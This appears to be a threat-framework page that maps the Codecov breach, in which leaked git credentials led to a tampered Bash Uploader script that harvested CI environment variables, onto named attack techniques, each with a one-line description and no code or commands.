AS3 - Codecov Breach

Codecov is a popular code coverage utility that is used as stem in the CI/CD of many companies.

To Campaign Map

Techniques:

Reconnaissance

T0103 - Scan Public Artifacts For Secrets

The attackers scanned Docker Hub and discovered git credentials in the official Codecov image
T0103 page

T0142 - Accidental Public Disclosure Of Internal Resources

The git credentials was indeliberately saved in the public docker image
T0142 page

Initial Access

T0114 - Compromised Service Account

The attackers gained access to Codecov's Git repo
T0114 page

Impact

T0191 - Malicious Code In Artifacts

The Bash Uploader script was modified to exfiltrate environnent variables of the running system
T0191 page

Resource Development

T0121 - Compromised Legitimate Artifact

T0121 page

Initial Access

T0122 - Vulnerability In Third-Party CI/CD Actions

The Bash Uploader script was used as part of 3rd party Github actions
T0122 page

Execution

T0118 - Command Injection

When the Codecov image was executed - the malicious implant in the Bash Uploader script exflitrated environment variable to the attacker controlled
T0118 page

T0159 - Malicious Artifact Execution

Customers that utilized the Codecov image were impacted
T0159 page

Credential Access

T0140 - Harvest Tokens From Environment Variables

T0140 page

LEGEND

Codecov
Codecov users